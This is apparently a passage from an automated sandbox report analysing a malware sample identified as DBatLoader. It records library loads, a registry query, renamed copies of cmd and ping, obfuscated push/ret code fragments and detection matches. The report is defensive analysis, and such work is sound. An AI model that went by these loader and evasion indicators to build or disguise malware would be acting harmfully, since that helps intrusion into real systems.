Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\nft438A5fN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: nft438A5fN.exe

Static file information: File size 1244672 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1585864121.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000002.1599731448.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
Source:	Binary string: easinvoker.pdbH source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A53F000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A510000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 0.2.nft438A5fN.exe.23465a8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE

Binary contains a suspicious time stamp

Source: alpha.pif.5.dr

Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CA894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02CA894C

PE file contains sections with non-standard names

Source: alpha.pif.5.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C963AE push 02C9640Bh; ret	0_2_02C96403
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C963B0 push 02C9640Bh; ret	0_2_02C96403
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9C349 push 8B02C9C1h; ret	0_2_02C9C34E
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBC378 push 02CBC56Eh; ret	0_2_02CBC566
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C96782 push 02C967C6h; ret	0_2_02C967BE
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C96784 push 02C967C6h; ret	0_2_02C967BE
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D6E716 push ecx; ret	0_2_02D6E729
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D4C446 push ecx; ret	0_2_02D4C459
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9C56C push ecx; mov dword ptr [esp], edx	0_2_02C9C571
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBC570 push 02CBC56Eh; ret	0_2_02CBC566
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA8AD8 push 02CA8B10h; ret	0_2_02CA8B08
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CAAADF push 02CAAB18h; ret	0_2_02CAAB10
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CAAAE0 push 02CAAB18h; ret	0_2_02CAAB10
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D04A50 push eax; ret	0_2_02D04B20
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9CBEC push 02C9CD72h; ret	0_2_02C9CD6A
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9CBE3 push 02C9CD72h; ret	0_2_02C9CD6A
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA886C push 02CA88AEh; ret	0_2_02CA88A6
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA6948 push 02CA69F3h; ret	0_2_02CA69EB
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA6946 push 02CA69F3h; ret	0_2_02CA69EB
